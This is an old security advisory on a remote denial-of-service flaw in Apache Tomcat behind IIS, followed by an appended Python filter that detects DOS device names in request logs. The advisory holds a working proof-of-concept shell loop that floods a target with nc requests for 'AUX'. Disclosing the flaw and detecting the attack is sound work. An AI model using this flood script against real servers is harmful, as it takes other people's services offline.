[VulnWatch] Apache Tomcat 3.x and 4.0.x: Remote denial-of-service vulnerability

From: Olaf Schulz (olaf.schulz@t-systems.com)
Date: 10/11/02


Date: Fri, 11 Oct 2002 13:36:55 +0200
From: Olaf Schulz <olaf.schulz@t-systems.com>
To: cert@cert.org, bugtraq@securityfocus.com, vulnwatch@vulnwatch.org



<Title:>
Apache Tomcat: Remote denial-of-service vulnerability

<Date:>
2002-09-06

<State:>
2002-10-11

<Vendor response:>
Vendor contacted on 2002-09-06.
Vendor is verifying the problem since 2002-09-10.
No news since then...

<Operating Systems:>

Microsoft Windows 2000
Microsoft Windows NT may be affected as well.

<Software:>
Apache Tomcat 3.3
Apache Tomcat 4.0.4
All versions prior to 4.1.x may be affected as well.

Apache Tomcat 4.1.10 (and probably higher) is not affected.

<Attack:>
A remote attacker can bring the servlet engine to a standstill.

<Description:>
In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a
denial-of-service attack.
An attacker can crash the Tomcat engine with multiple (e.g. 1000)
requests that contain DOS device names such as AUX, LPT1, CON or PRN.

Proof of concept code:
When Tomcat is serving servlets and JSPs under /examples/servlet/,
use:
- - - - --------8<----------------------------
#!/bin/sh
# Sends 10 x 10 x 10 = 1000 background requests for the AUX device name.
# <target_ip> and <target-port> are placeholders for the IIS front end.
for i in 1 2 3 4 5 6 7 8 9 0 ; do
  for j in 1 2 3 4 5 6 7 8 9 0 ; do
     for k in 1 2 3 4 5 6 7 8 9 0 ; do
        echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n" | nc <target_ip> <target-port> >/dev/null 2>&1 &
     done
  done
done
- - - - --------8<----------------------------

This attack works on a Microsoft IIS web server that is connected to the
Tomcat engine via the AJP 1.3 connector.
Standalone Tomcat engines (accessed via the HTTP interface on port
8080) are not vulnerable.

<Risk:>
Probability of an attack: HIGH
Damage probability: MEDIUM-HIGH

<Recommendation:>
1) Do not use Apache software on Microsoft operating systems.

2) When using Apache with IIS, enable the URLScan filter to filter DOS
device names out of HTTP requests.

3) Update to Apache Tomcat 4.1.x
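As an added illustration of recommendation 2 (not part of the original advisory, and not URLScan's own code), the following Python applies the check a front-end filter should make before IIS forwards a request to the AJP connector: it rejects any path segment that resolves to a reserved DOS device name (including "AUX.jsp", "aux:" and percent-encoded forms) and counts such requests per client over a few constructed log lines. The simplified log format and the addresses are made up for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Reserved DOS device names: Windows resolves them in any directory, and
# "AUX.jsp" or "aux:" still resolve to the device.
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{base}{n}" for base in ("COM", "LPT") for n in range(1, 10)
}

def is_device_name(segment: str) -> bool:
    """True if one path segment names a DOS device, ignoring case and any
    extension or trailing colon, as Windows does."""
    stem = segment.split(".")[0].split(":")[0].strip().upper()
    return stem in DOS_DEVICES

def request_hits_device(path: str) -> bool:
    """Decode the URL once, drop the query string, and test every path
    segment: the check a front-end filter should apply before IIS hands
    the request to the AJP connector."""
    decoded = unquote(path.split("?", 1)[0])
    return any(is_device_name(seg) for seg in decoded.split("/") if seg)

# Constructed sample log (hypothetical, simplified IIS W3C fields:
# client-ip method uri status); addresses are made up.
SAMPLE_LOG = """\
10.0.0.5 GET /examples/servlet/HelloWorldExample 200
10.0.0.9 GET /examples/servlet/AUX 500
10.0.0.9 GET /examples/servlet/aux 500
10.0.0.9 GET /examples/jsp/LPT1.jsp 500
10.0.0.9 GET /examples/servlet/%41UX 500
10.0.0.7 GET /examples/servlet/auxiliary 200
10.0.0.9 GET /examples/servlet/CON 500
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<status>\d{3})$")

def device_requests_by_client(log_text: str) -> Counter:
    """Count device-name requests per client IP; a burst from one address
    is the signal to alert on and to block at the front end."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and request_hits_device(m["uri"]):
            hits[m["ip"]] += 1
    return hits

if __name__ == "__main__":
    print(device_requests_by_client(SAMPLE_LOG))  # Counter({'10.0.0.9': 5})
```

Note that a plain substring rule would also block legitimate names such as /auxiliary; matching on the whole segment stem avoids that.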

Author: Olaf Schulz
        olaf.schulz@t-systems.com
        http://www.dcert.de



